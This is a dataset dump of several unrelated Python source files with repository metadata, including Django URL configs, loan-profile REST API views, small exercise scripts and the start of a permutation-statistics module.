"app_key": "String",
"nick": "String",
"start_date": "Date",
"end_date": "Date",
"created": "Date",
"modified": "Date",
"status": "String",
"valid": "Boolean",
}
nameType = properties[name]
pythonType = None
if nameType == "Number":
pythonType = int
elif nameType == "String":
pythonType = str
elif nameType == 'Boolean':
pythonType = bool
elif nameType == "Date":
pythonType = datetime
elif nameType == 'Field List':
            pythonType = str  # was a no-op comparison (==) in the original; assignment intended
elif nameType == 'Price':
pythonType = float
elif nameType == 'byte[]':
pythonType = str
else:
pythonType = getattr(
sys.modules[os.path.basename(
os.path.dirname(os.path.realpath(__file__))) + "." + nameType],
nameType)
return pythonType
def __init(self, kargs):
if kargs.has_key("app_key"):
self.app_key = self._newInstance("app_key", kargs["app_key"])
if kargs.has_key("nick"):
self.nick = self._newInstance("nick", kargs["nick"])
if kargs.has_key("start_date"):
self.start_date = self._newInstance("start_date", kargs["start_date"])
if kargs.has_key("end_date"):
self.end_date = self._newInstance("end_date", kargs["end_date"])
if kargs.has_key("created"):
self.created = self._newInstance("created", kargs["created"])
if kargs.has_key("modified"):
self.modified = self._newInstance("modified", kargs["modified"])
if kargs.has_key("status"):
self.status = self._newInstance("status", kargs["status"])
if kargs.has_key("valid"):
self.valid = self._newInstance("valid", kargs["valid"])
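# Illustrative usage sketch (not part of the SDK): keys follow the property
# table above, with values as they arrive from the API response.
# msg = AuthorizeMessage({"app_key": u"12023790", "valid": True,
#                         "created": u"2000-01-01 00:00:00"})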
| [
"[email protected]"
] | |
36f68e24f00be8957d914c829267f443aa391fd7 | 6e373b40393fb56be4437c37b9bfd218841333a8 | /Level_8/Lecture_8/Lecture_8/urls.py | 7ab7ccb82c8b8800412050eedcb9ac79244bbb63 | [] | no_license | mahto4you/Django-Framework | 6e56ac21fc76b6d0352f004a5969f9d4331defe4 | ee38453d9eceea93e2c5f3cb6895eb0dce24dc2b | refs/heads/master | 2023-01-22T01:39:21.734613 | 2020-12-04T03:01:17 | 2020-12-04T03:01:17 | 318,383,854 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 801 | py | """Lecture_8 URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
from enroll import views
urlpatterns = [
path('admin/', admin.site.urls),
path('', views.home),
]
| [
"[email protected]"
] | |
39e9192043571cd8f92f301ed58923d316e6ea5b | 15863dafe261decf655286de2fcc6e67cadef3d8 | /website/apps/advisor_portal/views/loan_profile_v1.py | 22f8087c08cbb5b4ecde950fc3832e48e7998731 | [] | no_license | protoprojects/worksample | 5aa833570a39d5c61e0c658a968f28140694c567 | f1a8cd8268d032ea8321e1588e226da09925b7aa | refs/heads/master | 2021-06-26T17:34:10.847038 | 2017-09-14T00:14:03 | 2017-09-14T00:14:03 | 103,463,317 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 24,040 | py | import logging
import datetime
from django.db.models import Prefetch, BooleanField, Case, Value, When, Q
from django.http import Http404
from rest_framework import viewsets, decorators, status, filters
from rest_framework.permissions import IsAuthenticated
from rest_framework.response import Response
from rest_framework.settings import api_settings
from rest_framework_extensions.mixins import NestedViewSetMixin
from advisor_portal.views.mixins import AdvisorTokenAuthMixin
from advisor_portal.filters import LoanProfileInProgressFilter
from advisor_portal.views import CRUD_ACTIONS, ENDPOINT_PROPERTY_METHODS
from advisor_portal.views.mixins import AdvisorSetMixin
from advisor_portal.views.loan_profile_v1_common import (
AdvisorLoanProfileV1BorrowerBaseView, BorrowerResourcesMixin,
CoborrowerResourcesMixin, CommonAddressView,
RestrictKindCreation, RestrictIncomesKindCreation,
HoldingAssetsOwnershipMixin, SelectForUpdateMixin, LiabilitiesRestrictionMixin,
)
from advisor_portal.paginators import (
SmallLimitOffsetPagination, LargePagePagination
)
from advisor_portal.permissions import (
AllowAdvisorPermission, LoanProfileModifyOperationsPermission,
)
from advisor_portal.serializers.loan_profile_v1 import (
AddressV1Serializer,
AdvisorLoanProfileV1ComplexSerializer,
BorrowerV1Serializer,
CoborrowerV1Serializer,
CreditRequestResponseSerializer,
EmploymentV1Serializer,
ExpenseV1Serializer,
HoldingAssetV1Serializer,
InsuranceAssetV1Serializer,
VehicleAssetV1Serializer,
IncomeV1Serializer,
LiabilityV1Serializer,
LoanProfileV1Serializer,
)
from loans.models import (
AddressV1, BorrowerV1, CoborrowerV1, EmploymentV1, ExpenseV1,
HoldingAssetV1, InsuranceAssetV1, VehicleAssetV1,
IncomeV1, LiabilityV1, LoanProfileV1,
)
from mismo_credit.models import CreditRequestResponse
from mismo_credit.tasks import start_credit_pull
from box.api_v1 import box_file_get
logger = logging.getLogger('sample.advisor_portal.views')
#
# Complex
#
class AdvisorLoanProfileV1ComplexView(AdvisorTokenAuthMixin,
AdvisorSetMixin,
viewsets.GenericViewSet,
viewsets.mixins.RetrieveModelMixin,
viewsets.mixins.CreateModelMixin,):
"""
This is a complex view, which accepts JSON which
describes loan profile and creating loan profile
with all related objects automatically.
"""
permission_classes = (IsAuthenticated, AllowAdvisorPermission,)
serializer_class = AdvisorLoanProfileV1ComplexSerializer
def create(self, request, *args, **kwargs):
"""
Overriding to do avoid incomplete data response,
returning ID will be enough.
"""
serializer = self.get_serializer(data=request.data)
serializer.is_valid(raise_exception=True)
self.perform_create(serializer)
headers = self.get_success_headers(serializer.data)
return Response({'id': serializer.data['id']}, status=status.HTTP_201_CREATED, headers=headers)
def retrieve(self, request, *args, **kwargs):
"""
Overriding to do a hack with related borrower and coborrower
objects.
"""
instance = self.get_object()
instance.borrower = instance.borrowers.last()
if instance.borrower:
instance.coborrower = instance.borrower.coborrower
serializer = self.get_serializer(instance)
return Response(serializer.data)
def get_queryset(self):
return self.request.user.loan_profilesV1.all()
advisor_loan_profile_complex_create_view = AdvisorLoanProfileV1ComplexView.as_view({'post': 'create'})
advisor_loan_profile_complex_view = AdvisorLoanProfileV1ComplexView.as_view({'get': 'retrieve'})
#
# RESTful
#
# Main
class AdvisorLoanProfileV1View(AdvisorTokenAuthMixin,
SelectForUpdateMixin,
AdvisorSetMixin,
NestedViewSetMixin,
viewsets.GenericViewSet,
viewsets.mixins.CreateModelMixin,
viewsets.mixins.UpdateModelMixin,
viewsets.mixins.ListModelMixin,
viewsets.mixins.RetrieveModelMixin,
viewsets.mixins.DestroyModelMixin):
"""
Base loan profile view.
"""
permission_classes = [IsAuthenticated, AllowAdvisorPermission, LoanProfileModifyOperationsPermission, ]
serializer_class = LoanProfileV1Serializer
filter_class = LoanProfileInProgressFilter
pagination_class = SmallLimitOffsetPagination
filter_backends = [filters.OrderingFilter] + api_settings.DEFAULT_FILTER_BACKENDS
ordering = ('-respa_triggered_within_last_week', '-updated')
ordering_fields = ('updated', 'borrowers__first_name', 'borrowers__last_name',)
qs_filter_kwargs = {
'is_active': True,
'encompass_sync_status__in': [
LoanProfileV1.ENCOMPASS_SYNCED,
LoanProfileV1.ENCOMPASS_NEVER_SYNCED,
LoanProfileV1.ENCOMPASS_SYNC_FAILED,
]
}
prefetch_list = [
Prefetch('new_property_address'),
Prefetch('borrowers'),
Prefetch('borrowers__mailing_address'),
Prefetch('borrowers__demographics'),
Prefetch('borrowers__realtor'),
Prefetch('borrowers__realtor__address'),
Prefetch('borrowers__previous_addresses'),
Prefetch('borrowers__previous_employment'),
Prefetch('borrowers__holding_assets'),
Prefetch('borrowers__vehicle_assets'),
Prefetch('borrowers__insurance_assets'),
Prefetch('borrowers__income'),
Prefetch('borrowers__expense'),
Prefetch(
'borrowers__coborrower',
queryset=CoborrowerV1.objects.filter(is_active=True)
),
Prefetch('borrowers__coborrower__mailing_address'),
Prefetch('borrowers__coborrower__demographics'),
Prefetch('borrowers__coborrower__realtor'),
Prefetch('borrowers__coborrower__realtor__address'),
Prefetch('borrowers__coborrower__previous_addresses'),
Prefetch('borrowers__coborrower__previous_employment'),
Prefetch('borrowers__coborrower__holding_assets'),
Prefetch('borrowers__coborrower__vehicle_assets'),
Prefetch('borrowers__coborrower__insurance_assets'),
Prefetch('borrowers__coborrower__income'),
Prefetch('borrowers__coborrower__expense'),
Prefetch('credit_request_responses'),
]
def _get_paginated_lp_ids(self):
"""
To reduce time on ordering and slicing,
it is faster to take needed IDs first
to avoid decryption, and then simply select
needed loan profiles.
Filtered and sorted ids are paginated in the
way we're paginating simple queryset.
"""
qs = self.request.user.loan_profilesV1.filter(
**self.qs_filter_kwargs
).values_list(
'id', flat=True
)
qs = self.annotate_queryset(qs)
qs = self.filter_queryset(qs)
return self.paginate_queryset(qs)
def annotate_queryset(self, qs):
today = datetime.date.today()
week_ago = today - datetime.timedelta(days=7)
is_respa_triggered_within_last_week_expr = Case(
When(Q(_respa_triggered=True) & Q(updated__gt=week_ago), then=Value(True)),
default=Value(False),
output_field=BooleanField()
)
return qs.annotate(respa_triggered_within_last_week=is_respa_triggered_within_last_week_expr)
def get_paginated_qs(self):
assert hasattr(self, '_get_paginated_lp_ids'), "%s has not '_get_paginated_lp_ids' attribute" % self
qs = self.request.user.loan_profilesV1.prefetch_related(
*self.prefetch_list
).filter(
id__in=self._get_paginated_lp_ids()
)
qs = self.annotate_queryset(qs)
qs = filters.OrderingFilter().filter_queryset(self.request, qs, self)
return qs
def get_queryset(self):
return self.request.user.loan_profilesV1.prefetch_related(
*self.prefetch_list
).filter(
**self.qs_filter_kwargs
)
def list(self, request, *args, **kwargs):
"""
Overriding method because we don't need to paginate
queryset since we selecting needed loan profiles by
using `self._get_paginated_lp_ids()`.
"""
assert hasattr(self, 'get_paginated_qs'), "%s has not 'get_paginated_qs' attribute" % self
queryset = self.get_paginated_qs()
serializer = self.get_serializer(queryset, many=True)
return self.get_paginated_response(serializer.data)
def perform_destroy(self, instance):
instance.is_active = False
instance.save()
# properties
@decorators.detail_route(methods=['post'], permission_classes=[IsAuthenticated, AllowAdvisorPermission])
def storage(self, *args, **kwargs):
instance = self.get_object()
instance.create_storage()
if not instance.storage:
return Response(status=status.HTTP_400_BAD_REQUEST)
data = {'id': instance.storage.box_folder_id}
return Response(data=data, status=status.HTTP_201_CREATED)
# pylint: disable=no-self-use
@decorators.detail_route(methods=ENDPOINT_PROPERTY_METHODS)
def new_property_address(self, request, *args, **kwargs):
"""
Endpoint-property, new property address of loan profile entry.
"""
view = CommonAddressView
view.filters = {'loanprofilev1': kwargs['pk']}
view.related_set_attr = 'loanprofilev1_set'
return view.as_view(CRUD_ACTIONS)(request, *args, **kwargs)
# actions
@decorators.detail_route(methods=['post'])
def los_guid(self, *args, **kwargs):
"""
POST for LOS GUID
"""
data = {}
instance = self.get_object()
if instance.encompass_sync_status not in [
LoanProfileV1.ENCOMPASS_NEVER_SYNCED,
LoanProfileV1.ENCOMPASS_SYNC_FAILED
]:
logger.warning('LOS-GUID-REQUEST-SYNC-BAD-STATUS %s', instance.guid)
data['request_submitted'] = False
return Response(data=data, status=status.HTTP_400_BAD_REQUEST)
preflight_warnings = instance.encompass_sync_warnings()
if preflight_warnings:
data['request_submitted'] = False
data['warnings'] = preflight_warnings
logger.warning('LOS-GUID-PREFLIGHT-WARNINGS %s %s',
instance.guid, preflight_warnings)
return Response(data=data, status=status.HTTP_400_BAD_REQUEST)
        try:
            submitted = instance.sync_to_encompass()
        except Exception:  # any sync failure is reported back as "not submitted"
            submitted = False
data['request_submitted'] = submitted
http_status = status.HTTP_201_CREATED if submitted else status.HTTP_400_BAD_REQUEST
return Response(data=data, status=http_status)
@decorators.detail_route(methods=['post'])
def confirm_demographics_questions(self, *args, **kwargs):
instance = self.get_object()
instance.is_demographics_questions_request_confirmed = True
instance.save()
return Response(status=status.HTTP_204_NO_CONTENT)
@decorators.detail_route(methods=['post'])
def credit_request(self, *args, **kwargs):
instance = self.get_object()
return start_credit_pull(instance.guid)
@decorators.detail_route(methods=['patch'])
def trigger_respa(self, *args, **kwargs):
instance = self.get_object()
data = instance.respa_criteria_for_advisor_portal()
http_status = status.HTTP_200_OK if instance.trigger_respa_for_advisor_portal() else status.HTTP_400_BAD_REQUEST
return Response(data=data, status=http_status)
@decorators.detail_route(methods=['get'])
def advisor_credit_pdf_view_url(self, *args, **kwargs):
instance = self.get_object()
summary = instance.find_valid_credit_report_summary()
if summary is None:
logging.exception("MISMO-CREDIT-SHARED-LINK-FAIL-NO-SUMMARY lp %s", instance.id)
data = {'url': ""}
resp_status = status.HTTP_404_NOT_FOUND
else:
#TODO: https://app.asana.com/0/26776562531082/310821218441711
box_file = box_file_get(summary.report_pdf_document.document_id)
shared_link = box_file.get_shared_link(access='company', allow_preview=True)
data = {'url': shared_link}
resp_status = status.HTTP_200_OK
return Response(data=data, status=resp_status)
@decorators.detail_route(methods=['post'])
def unlock_loan(self, *args, **kwargs):
instance = self.get_object()
if instance.lock_owner != instance.LOCK_OWNER_CHOICES.advisor:
instance.update_from_mortgage_profile()
instance.lock_owner = instance.LOCK_OWNER_CHOICES.advisor
instance.save()
data = {'lock_owner': instance.lock_owner}
return Response(data, status=status.HTTP_200_OK)
class AdvisorLoanProfileV1SyncInProgressView(AdvisorLoanProfileV1View):
"""
Loan profile view which represents LoanProfile's,
which are currently syncing with encompass.
"""
permission_classes = [IsAuthenticated, AllowAdvisorPermission, ]
serializer_class = LoanProfileV1Serializer
pagination_class = LargePagePagination
ordering = ('-updated')
qs_filter_kwargs = {
'is_active': True,
'encompass_sync_status__in': [
LoanProfileV1.ENCOMPASS_READY_TO_SYNC,
LoanProfileV1.ENCOMPASS_SYNC_IN_PROGRESS,
LoanProfileV1.ENCOMPASS_SYNC_FAILED,
]
}
advisor_loan_profile_v1_sync_in_progress_view = AdvisorLoanProfileV1SyncInProgressView.as_view({'get': 'list'})
# Credit Request
class AdvisorLoanProfileV1CreditRequestResponseView(
AdvisorTokenAuthMixin,
NestedViewSetMixin,
viewsets.ReadOnlyModelViewSet):
"""
Credit Report View
"""
permission_classes = [IsAuthenticated, AllowAdvisorPermission]
serializer_class = CreditRequestResponseSerializer
model = CreditRequestResponse
def get_queryset(self):
return self.filter_queryset_by_parents_lookups(
self.model.objects.all().prefetch_related(
Prefetch('credit_report_summary'),
Prefetch('credit_report_summary__credit_report_scores'),
)
)
# Borrower
class AdvisorLoanProfileV1BorrowerV1View(AdvisorLoanProfileV1BorrowerBaseView):
"""
Base borrower view.
"""
serializer_class = BorrowerV1Serializer
model = BorrowerV1
properties_mapping = {
'address': 'borrowerv1_address',
'mailing_address': 'borrowerv1_mailing_address',
'demographics': 'borrowerv1',
'employment': 'borrowerv1_employment',
'realtor': 'borrowerv1_realtor',
}
def perform_create(self, serializer):
loan_profile_id = self.kwargs['loan_profile']
try:
loan_profile = LoanProfileV1.objects.get(id=loan_profile_id)
except LoanProfileV1.DoesNotExist:
raise Http404('Loan profile with id "{}" does not exist'.format(loan_profile_id))
else:
serializer.save(loan_profile=loan_profile)
class BorrowerPreviousAddressesView(BorrowerResourcesMixin):
"""
Base view of borrower previous addresses.
"""
serializer_class = AddressV1Serializer
model = AddressV1
m2m_rel_attr = 'previous_addresses'
instance_count_maximum = 10
class BorrowerPreviousEmploymentsView(BorrowerResourcesMixin):
"""
Base view of borrower employment history.
"""
serializer_class = EmploymentV1Serializer
model = EmploymentV1
m2m_rel_attr = 'previous_employment'
instance_count_maximum = 10
# pylint: disable=no-self-use
@decorators.detail_route(methods=ENDPOINT_PROPERTY_METHODS)
def address(self, request, *args, **kwargs):
"""
Endpoint-property, address of employment object.
"""
view = CommonAddressView
view.filters = {'employmentv1_address': kwargs['pk']}
view.related_set_attr = 'employmentv1_address'
return view.as_view(CRUD_ACTIONS)(request, *args, **kwargs)
# pylint: disable=no-self-use
@decorators.detail_route(methods=ENDPOINT_PROPERTY_METHODS)
def company_address(self, request, *args, **kwargs):
"""
Endpoint-property, company address of employment object.
"""
view = CommonAddressView
view.filters = {'employmentv1_company_address': kwargs['pk']}
view.related_set_attr = 'employmentv1_company_address'
return view.as_view(CRUD_ACTIONS)(request, *args, **kwargs)
class BorrowerHoldingAssetsView(HoldingAssetsOwnershipMixin, BorrowerResourcesMixin):
"""
Base view of borrower holding assets.
"""
serializer_class = HoldingAssetV1Serializer
model = HoldingAssetV1
m2m_rel_attr = 'holding_assets'
# pylint: disable=no-self-use
@decorators.detail_route(methods=ENDPOINT_PROPERTY_METHODS)
def institution_address(self, request, *args, **kwargs):
"""
Endpoint-property, institution address of holding asset object.
"""
view = CommonAddressView
view.filters = {'holdingassetv1_institution_address': kwargs['pk']}
view.related_set_attr = 'holdingassetv1_institution_address'
return view.as_view(CRUD_ACTIONS)(request, *args, **kwargs)
class BorrowerVehicleAssetsView(BorrowerResourcesMixin):
"""
Base view of borrower vehicle assets.
"""
serializer_class = VehicleAssetV1Serializer
model = VehicleAssetV1
m2m_rel_attr = 'vehicle_assets'
class BorrowerInsuranceAssetsView(BorrowerResourcesMixin):
"""
Base view of borrower insurance assets.
"""
serializer_class = InsuranceAssetV1Serializer
model = InsuranceAssetV1
m2m_rel_attr = 'insurance_assets'
class BorrowerIncomesView(RestrictIncomesKindCreation, BorrowerResourcesMixin):
"""
Base view of borrower incomes.
"""
serializer_class = IncomeV1Serializer
model = IncomeV1
m2m_rel_attr = 'income'
class BorrowerExpensesView(RestrictKindCreation, BorrowerResourcesMixin):
"""
Base view of borrower expenses.
"""
serializer_class = ExpenseV1Serializer
model = ExpenseV1
m2m_rel_attr = 'expense'
class BorrowerLiabilitiesView(LiabilitiesRestrictionMixin, BorrowerResourcesMixin):
"""
Base view of borrower liabilities.
"""
serializer_class = LiabilityV1Serializer
model = LiabilityV1
m2m_rel_attr = 'liabilities'
# Coborrower
class AdvisorLoanProfileV1CoborrowerV1View(AdvisorLoanProfileV1BorrowerBaseView):
"""
    Base coborrower view.
"""
serializer_class = CoborrowerV1Serializer
model = CoborrowerV1
properties_mapping = {
'address': 'coborrowerv1_address',
'mailing_address': 'coborrowerv1_mailing_address',
'demographics': 'coborrowerv1',
'employment': 'coborrowerv1_employment',
'realtor': 'coborrowerv1_realtor',
}
@staticmethod
def _create_coborrower(borrower_id, serializer_instance):
try:
borrower = BorrowerV1.objects.get(id=borrower_id)
except BorrowerV1.DoesNotExist:
raise Http404('Borrower with id "{}" does not exist'.format(borrower_id))
else:
return serializer_instance.save(borrower=borrower)
@staticmethod
def _restore_coborrower(coborrower_obj, serializer_instance):
coborrower_obj.is_active = True
coborrower_obj.save()
serializer_instance.instance = coborrower_obj
return coborrower_obj
def perform_create(self, serializer):
borrower_id = self.kwargs['borrower']
try:
coborrower_obj = CoborrowerV1.objects.get(
borrower_id=borrower_id
)
except CoborrowerV1.DoesNotExist:
return self._create_coborrower(
borrower_id=borrower_id,
serializer_instance=serializer,
)
else:
return self._restore_coborrower(
coborrower_obj=coborrower_obj,
serializer_instance=serializer,
)
class CoborrowerPreviousAddressesView(CoborrowerResourcesMixin):
"""
Base view of coborrower previous addresses.
"""
serializer_class = AddressV1Serializer
model = AddressV1
m2m_rel_attr = 'previous_addresses'
instance_count_maximum = 10
class CoborrowerPreviousEmploymentsView(CoborrowerResourcesMixin):
"""
    Base view of coborrower employment history.
"""
serializer_class = EmploymentV1Serializer
model = EmploymentV1
m2m_rel_attr = 'previous_employment'
instance_count_maximum = 10
# pylint: disable=no-self-use
@decorators.detail_route(methods=ENDPOINT_PROPERTY_METHODS)
def address(self, request, *args, **kwargs):
"""
Endpoint-property, address of employment object.
"""
view = CommonAddressView
view.filters = {'employmentv1_address': kwargs['pk']}
view.related_set_attr = 'employmentv1_address'
return view.as_view(CRUD_ACTIONS)(request, *args, **kwargs)
# pylint: disable=no-self-use
@decorators.detail_route(methods=ENDPOINT_PROPERTY_METHODS)
def company_address(self, request, *args, **kwargs):
"""
Endpoint-property, company address of employment object.
"""
view = CommonAddressView
view.filters = {'employmentv1_company_address': kwargs['pk']}
view.related_set_attr = 'employmentv1_company_address'
return view.as_view(CRUD_ACTIONS)(request, *args, **kwargs)
class CoborrowerHoldingAssetsView(HoldingAssetsOwnershipMixin, CoborrowerResourcesMixin):
"""
Base view of coborrower holding assets.
"""
serializer_class = HoldingAssetV1Serializer
model = HoldingAssetV1
m2m_rel_attr = 'holding_assets'
# pylint: disable=no-self-use
@decorators.detail_route(methods=ENDPOINT_PROPERTY_METHODS)
def institution_address(self, request, *args, **kwargs):
"""
Endpoint-property, institution address of holding asset object.
"""
view = CommonAddressView
view.filters = {'holdingassetv1_institution_address': kwargs['pk']}
view.related_set_attr = 'holdingassetv1_institution_address'
return view.as_view(CRUD_ACTIONS)(request, *args, **kwargs)
class CoborrowerVehicleAssetsView(CoborrowerResourcesMixin):
"""
Base view of coborrower vehicle assets.
"""
serializer_class = VehicleAssetV1Serializer
model = VehicleAssetV1
m2m_rel_attr = 'vehicle_assets'
class CoborrowerInsuranceAssetsView(CoborrowerResourcesMixin):
"""
Base view of coborrower insurance assets.
"""
serializer_class = InsuranceAssetV1Serializer
model = InsuranceAssetV1
m2m_rel_attr = 'insurance_assets'
class CoborrowerIncomesView(RestrictIncomesKindCreation, CoborrowerResourcesMixin):
"""
Base view of coborrower incomes.
"""
serializer_class = IncomeV1Serializer
model = IncomeV1
m2m_rel_attr = 'income'
class CoborrowerExpensesView(RestrictKindCreation, CoborrowerResourcesMixin):
"""
Base view of coborrower expenses.
"""
serializer_class = ExpenseV1Serializer
model = ExpenseV1
m2m_rel_attr = 'expense'
class CoborrowerLiabilitiesView(LiabilitiesRestrictionMixin, CoborrowerResourcesMixin):
"""
Base view of borrower liabilities.
"""
serializer_class = LiabilityV1Serializer
model = LiabilityV1
m2m_rel_attr = 'liabilities'
| [
"[email protected]"
] | |
6038afd572bebeb6555821f05e0710b04f59d809 | 98c6ea9c884152e8340605a706efefbea6170be5 | /examples/data/Assignment_3/wllgar015/question3.py | 73caabd33916af860b5d886602e949a64214f59d | [] | no_license | MrHamdulay/csc3-capstone | 479d659e1dcd28040e83ebd9e3374d0ccc0c6817 | 6f0fa0fa1555ceb1b0fb33f25e9694e68b6a53d2 | refs/heads/master | 2021-03-12T21:55:57.781339 | 2014-09-22T02:22:22 | 2014-09-22T02:22:22 | 22,372,174 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,807 | py | #question 3
message=input("Enter the message:\n")
repeat=eval(input("Enter the message repeat count:\n"))
frame=eval(input("Enter the frame thickness:\n"))
def awesome(message, repeat, frame):
    #Each frame layer adds two characters to the width of the message line.
    #The frame value is how many nested border lines are printed at the top
    #and at the bottom, and how many '|' bars pad each side of the message.
    #For example, frame = 2 means two border lines above, two below, and two
    #bars on either side. The repeat value is how many times the message
    #line itself is printed.
if frame>0:
print("+","-"*(len(message)+2*frame),"+",sep="")
#counters help a lot ;)
count=1
dcount=1
#first loop for top frame
for i in range(frame-1): #it is frame-1 because we have printed one of the frames already. range(frame) will result in an extra unneccessary line.
print("|"*(count),"+",(len(message)+2*frame-2*dcount)*"-","+","|"*(count),sep="")
count+=1
dcount+=1
#second loop for message
for i in range(repeat):
print("|"*frame,message,"|"*frame)
#third loop for bottom frame which is the inverse of the top loop
count=frame-1
dcount=frame-1
    #bottom frame loop (mirror of the top loop)
    for i in range(frame-1): #frame-1 because the final border line is printed separately below; range(frame) would add an unnecessary extra line
print("|"*(count),"+",(len(message)+2*frame-2*dcount)*"-","+","|"*(count),sep="")
count-=1
dcount-=1
if frame>0:
print("+","-"*(len(message)+2*frame),"+",sep="")
awesome(message, repeat, frame)
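# Illustrative run (assumed inputs): message "hi", repeat 1, frame 2 prints
#   +------+
#   |+----+|
#   || hi ||
#   |+----+|
#   +------+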
| [
"[email protected]"
] | |
dc11c2a9a91ce330d48bdf58adb1905e8abc7e5f | 219b7903ad9b16acb4790f561952021e60f23abe | /giftexchange/admin.py | 671384fdd7635bf9f0761dcda08bdcce3a118864 | [] | no_license | astromitts/gifterator3000 | 40663de82526ef874c05d9385f53e6c2e3cb1625 | 64a8c420eb7b729c96861aa430f7f15cbe499d3d | refs/heads/master | 2023-01-28T06:47:09.110323 | 2020-12-04T01:43:53 | 2020-12-04T01:43:53 | 293,815,931 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 608 | py | from django.contrib import admin
from giftexchange.models import (
GiftExchange,
Participant,
AppUser,
ExchangeAssignment,
AppInvitation,
MagicLink
)
class ParticipantInline(admin.TabularInline):
model = Participant
fields = ['appuser']
class GiftExchangeAdmin(admin.ModelAdmin):
inlines = [
ParticipantInline,
]
list_display = ['title', 'date']
admin.site.register(AppUser)
admin.site.register(GiftExchange, GiftExchangeAdmin)
admin.site.register(Participant)
admin.site.register(ExchangeAssignment)
admin.site.register(AppInvitation)
admin.site.register(MagicLink)
| [
"[email protected]"
] | |
ed6deb8cf63883ec1dce2f0f037fd6877ffbaea1 | c8c9278ffb74da44789b310540693c66468b998c | /shop/urls.py | 87f494b760e5ec8a18cf0fe7c69c724930fc0633 | [] | no_license | danielspring-crypto/ekit | bdfcec4b2ce8e36bb9e692f7a825bfce0bbf4166 | 560f6fa5522e1cb4a2cf30325b2b1b07beceea3d | refs/heads/main | 2023-01-28T00:20:22.058791 | 2020-12-07T08:33:06 | 2020-12-07T08:33:06 | 319,253,641 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 301 | py | from django.urls import path
from .import views
app_name = 'shop'
urlpatterns = [
path('', views.product_list, name='product_list'),
path('<slug:category_slug>/', views.product_list, name='product_list_by_category'),
path('<int:id>/<slug:slug>/', views.product_detail, name='product_detail'),
] | [
"[email protected]"
] | |
1f44b4b6d3e46f04b442fb65029b4ba093647a51 | 9ae936a9689832a5b22cd12998c5dc5047aee164 | /December_2020/December_2020/5_dec_2020/test.py | b410a47a0763433f3d18e060eca479c4c3ca3919 | [] | no_license | inderdevkumar/2020-Python-Projects | 218320335f352dc340877d1ef62b65605ce4ccfd | 210154d092021d8de5f30797af9ad8e193e3c68e | refs/heads/master | 2023-02-04T08:47:05.952342 | 2020-12-25T15:33:27 | 2020-12-25T15:33:27 | 322,878,822 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,596 | py | #===================== Function Defination to check prime numbers=================================
from itertools import count, islice
primes = (n for n in count(2) if all(n % d for d in range(2, n)))
print("100th prime is %d" % next(islice(primes, 99, 100)))
#===================== Function Definition to test whether a number is prime =====================
def primetest(number):
    # Trial-division primality check; pi_euler1 below relies on this helper,
    # which was missing from the original file.
    if number < 2:
        return False
    return all(number % d for d in range(2, int(number ** 0.5) + 1))
#===================== Function Definition for the Euler product approximation of pi =============
def pi_euler1(n):
count = 0
potentialprime = 3
prime_lists= [] #To store list of prime numbers
deno_list= [] #To store list of denominators which are closed to numerator
product= 1
while count < n: #use the parameter n rather than the global user_input_number
if primetest(potentialprime) == True:
prime_lists.append(potentialprime) #Appending prime_lists
count += 1
potentialprime += 1
else:
potentialprime += 1
for value in prime_lists:
denominator_list= [i*4 for i in range(1,n)]
denominator= denominator_list[min(range(len(denominator_list)), key = lambda i: abs(denominator_list[i]-value))] #Finding the denominator closest to the numerator
deno_list.append(denominator) #Appending deno_list
product= product*(value/denominator) #Finding product of expression
print("Prime Lists are: ", prime_lists)
print("Denominator Lists are: ", deno_list)
print(f"pi euler1 for {n} is: ", product*4) #To get the desired output. This calculation is performed
if __name__ == "__main__":
user_input_number= int(input("Enter the number of terms: "))
pi_euler1(user_input_number)
| [
"[email protected]"
] | |
3ba42d75b8d7773ba4b0b673f1dbbbdaf2f8c9ec | 4a41223e8c8ab33d83c6f213692c6097bb96540d | /eelbrain/_stats/permutation.py | b4e3ec6a2a339c793de3982c33ed7a8d87dbda5e | [
"BSD-3-Clause"
] | permissive | rbaehr/Eelbrain | 33ceeee24533581ab3e7569c31e0f6a6c6dfcda1 | 6301dc256e351fdbb58bbe13ab48fde7bfcf192a | refs/heads/master | 2021-07-05T19:19:20.573231 | 2017-10-03T04:35:23 | 2017-10-03T04:35:23 | 104,907,464 | 0 | 0 | null | 2017-09-26T16:03:20 | 2017-09-26T16:03:20 | null | UTF-8 | Python | false | false | 6,505 | py | # Author: Christian Brodbeck <[email protected]>
from itertools import izip
from math import ceil
import random
import numpy as np
from .._data_obj import NDVar, Var
from .._utils import intervals
_YIELD_ORIGINAL = 0
# for testing purposes, yield original order instead of permutations
def _resample_params(N, samples):
"""Decide whether to do permutations or random resampling
Parameters
----------
N : int
Number of observations.
samples : int
``samples`` parameter (number of resampling iterations, or < 0 to
sample all permutations).
Returns
-------
actual_n_samples : int
Adapted number of resamplings that will be done.
samples_param : int
Samples parameter for the resample function (-1 to do all permutations,
otherwise same as n_samples).
"""
n_perm = 2 ** N
if n_perm - 1 <= samples:
samples = -1
if samples < 0:
n_samples = n_perm - 1
else:
n_samples = samples
return n_samples, samples
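# Illustrative examples (added; the values follow directly from the rule above):
#   _resample_params(4, 10000)   # 2**4 - 1 = 15 <= 10000  ->  (15, -1): all permutations
#   _resample_params(20, 10000)  # 2**20 - 1 > 10000       ->  (10000, 10000): random sampling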
def permute_order(n, samples=10000, replacement=False, unit=None, seed=0):
"""Generator function to create indices to shuffle n items
Parameters
----------
n : int
Number of cases.
samples : int
Number of samples to yield. If < 0, all possible permutations are
performed.
replacement : bool
whether random samples should be drawn with replacement or without.
unit : categorial
Factor specifying unit of measurement (e.g. subject). If unit is
specified, resampling proceeds by first resampling the categories of
unit (with or without replacement) and then shuffling the values
within units (no replacement).
seed : None | int
Seed the random state of the relevant randomization module
(:mod:`random` or :mod:`numpy.random`) to make replication possible.
